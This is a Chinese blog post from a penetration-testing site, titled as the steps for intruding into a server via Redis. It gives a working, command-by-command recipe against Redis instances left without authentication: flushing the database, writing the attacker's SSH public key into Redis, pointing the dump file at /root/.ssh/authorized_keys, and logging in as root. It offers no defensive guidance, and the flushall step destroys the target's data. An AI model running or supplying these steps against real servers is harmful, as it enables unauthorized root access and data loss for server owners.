通过redis入侵服务器的步骤


Jul 08 2016

通过redis入侵服务器的步骤

首页 » 渗透测试 » 通过redis入侵服务器的步骤   

通过redis入侵服务器的原理是:利用了redis默认配置,许多用户没有设置访问的key。然后通过向redis把自己的公钥写入到redis,然后利更改redis的数据库文件配置,把数据写入到认证文件。形成免密码登陆。
一,生成本地ssh公钥

ssh-keygen
二,先连接redis看看


telnet 192.168.15.10 6379
redis-cli -h 192.168.15.10
三, 清一下redis数据库

redis-cli -h 192.168.15.10 flushall
四, 向redis写自己的公钥

catkey.txt |redis-cli -h 192.168.15.10 -xsetredis
五, 利用redis写入到文件中

 

#连接redis
#redis-cli -h 192.168.15.10
#查看keys
192.168.15.10>keys *
#写入配置库的路径及存放位置
192.168.15.10>CONFIG SETdir/root/.ssh/
#写入配置库名称及存放的名字
192.168.15.10>CONFIG SET dbfilename"authorized_keys"
#写入
192.168.15.10>save
#退出
192.168.15.10>exit
六, 远程连接

sshroot@192.168.15.10
注意,这个是使用的默认的。也就是说别人是用的root来启动的redis 并且没有更改sshd配置文件的位置,以及redis可以默认的可以随意访问性的。当然有许多可以猜。
这个是最近redis爆出来的。

 

正文部分到此结束

文章标签: Redis漏洞 redis入侵

版权声明:若无特殊注明,本文皆为( mOon )原创,转载请保留文章出处。

也许喜欢: «极客教学:如何使用树莓派击落&劫持无人机 | Yii防注入攻击笔记 - imxiu»

这篇文章还没有收到评论,赶紧来抢沙发吧~